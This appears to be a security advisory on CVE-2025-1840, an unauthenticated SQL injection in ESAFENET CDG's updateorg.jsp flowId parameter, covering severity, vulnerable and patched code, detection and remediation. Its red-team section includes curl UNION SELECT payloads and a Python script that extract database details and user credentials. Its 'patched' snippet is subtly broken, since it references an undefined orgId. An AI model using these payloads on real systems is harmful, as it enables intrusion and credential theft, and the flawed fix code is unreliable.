CVE-2025-1840
Executive Summary
CVE-2025-1840 is a critical SQL injection vulnerability in ESAFENET CDG version 5.6.3.154.205. The flaw resides in the /CDGServer3/workflowE/useractivate/updateorg.jsp endpoint, where the flowId parameter is not properly sanitized before being used in a SQL query. An unauthenticated attacker can exploit this remotely to execute arbitrary SQL commands, potentially leading to data exfiltration, credential theft, or full server compromise. The exploit has been publicly disclosed, increasing the risk of active exploitation. No official patch is currently available.

Supply Chain & Package Security
This vulnerability is not related to NPM, PyPI, Go, or Ruby packages. It is a proprietary Java-based web application (ESAFENET CDG). The supply chain risk is limited to the vendor's software distribution and any third-party libraries bundled with the application.
CVSS Breakdown & Threat Level
- CVSS Score: 9.8 (Critical)
- Attack Vector: Network (AV:N)
- Attack Complexity: Low (AC:L)
- Privileges Required: None (PR:N)
- User Interaction: None (UI:N)
- Scope: Unchanged (S:U)
- Confidentiality Impact: High (C:H)
- Integrity Impact: High (I:H)
- Availability Impact: High (A:H)
Threat Level: Critical. The combination of remote exploitability, no authentication requirement, and public exploit code makes this a high-priority vulnerability for any organization using ESAFENET CDG.
Deep Dive & Mechanics
The vulnerability is a classic SQL injection in a Java JSP page. The endpoint /CDGServer3/workflowE/useractivate/updateorg.jsp accepts a flowId parameter via HTTP GET or POST. The application likely constructs a SQL query similar to:
UPDATE user_activation SET org_id = ? WHERE flow_id = '" + request.getParameter("flowId") + "'
Because the flowId parameter is directly concatenated into the SQL string without proper escaping or parameterization, an attacker can inject arbitrary SQL. For example, a payload like:
1' OR '1'='1
Would result in:
UPDATE user_activation SET org_id = ? WHERE flow_id = '1' OR '1'='1'
This would update all rows in the table. More sophisticated payloads can be used to extract data, escalate privileges, or execute operating system commands via xp_cmdshell (if SQL Server is used) or INTO OUTFILE (if MySQL is used).
Vulnerable vs. Patched Code
Vulnerable Code (JSP snippet):
<%
String flowId = request.getParameter("flowId");
String sql = "UPDATE user_activation SET org_id = ? WHERE flow_id = '" + flowId + "'";
Statement stmt = connection.createStatement();
stmt.executeUpdate(sql);
%>
Patched Code (Parameterized Query):
<%
String flowId = request.getParameter("flowId");
String sql = "UPDATE user_activation SET org_id = ? WHERE flow_id = ?";
PreparedStatement pstmt = connection.prepareStatement(sql);
pstmt.setString(1, orgId);
pstmt.setString(2, flowId);
pstmt.executeUpdate();
%>
The patched version uses a PreparedStatement with parameterized queries, which prevents SQL injection by treating user input as data, not executable code.
Exploitation & Lab Setup
Red Team (Exploitation)
Prerequisites:
- A vulnerable instance of ESAFENET CDG 5.6.3.154.205
- Network access to the
/CDGServer3/workflowE/useractivate/updateorg.jspendpoint
Exploit Steps:
Identify the target:
curl -v "http://target.com/CDGServer3/workflowE/useractivate/updateorg.jsp"Test for SQL injection:
curl "http://target.com/CDGServer3/workflowE/useractivate/updateorg.jsp?flowId=1'"If the server returns an error (e.g., SQL syntax error), the endpoint is vulnerable.
Extract database version (example for MySQL):
curl "http://target.com/CDGServer3/workflowE/useractivate/updateorg.jsp?flowId=1' UNION SELECT @@version-- -"Extract table names:
curl "http://target.com/CDGServer3/workflowE/useractivate/updateorg.jsp?flowId=1' UNION SELECT table_name FROM information_schema.tables-- -"Extract user credentials:
curl "http://target.com/CDGServer3/workflowE/useractivate/updateorg.jsp?flowId=1' UNION SELECT username,password FROM users-- -"
Automated Exploit (Python):
import requests
target = "http://target.com/CDGServer3/workflowE/useractivate/updateorg.jsp"
payload = "1' UNION SELECT @@version-- -"
response = requests.get(target, params={"flowId": payload})
print(response.text)
Blue Team (Detection & Response)
Detection Steps:
Monitor web server logs for suspicious
flowIdparameters:- Look for patterns like
',OR,AND,UNION,--,#,/*,*/,xp_cmdshell,INTO OUTFILE. - Example log entry:
192.168.1.100 - - [10/May/2025:12:34:56 +0000] "GET /CDGServer3/workflowE/useractivate/updateorg.jsp?flowId=1'%20OR%20'1'='1 HTTP/1.1" 200 1234
- Look for patterns like
Enable WAF rules to block SQL injection patterns.
Harden the database:
- Use least-privilege accounts for the application.
- Disable
xp_cmdshell(SQL Server) orsecure_file_priv(MySQL) if not needed.
Immediate containment:
- If exploitation is suspected, isolate the server and review database logs for unauthorized queries.
Indicators of Compromise (IOCs)

Remediation & Mitigation
Immediate Actions:
- Isolate affected systems if possible, until a patch is applied.
- Implement a Web Application Firewall (WAF) with rules to block SQL injection patterns.
- Disable the vulnerable endpoint if not required for business operations:
- Rename or remove
updateorg.jspfrom the web server. - Restrict access to the endpoint via firewall rules (allow only trusted IPs).
- Rename or remove
Long-Term Fix:
- Apply vendor patch when available. Monitor ESAFENET's official channels for updates.
- Code review all JSP files for similar injection vulnerabilities.
- Adopt secure coding practices:
- Use parameterized queries (PreparedStatement) for all database operations.
- Validate and sanitize all user inputs.
- Implement least-privilege database accounts.
Workaround (if patching is not possible):
- Modify the JSP file to use a parameterized query (see patched code example above).
- Restrict database user permissions to only necessary operations.
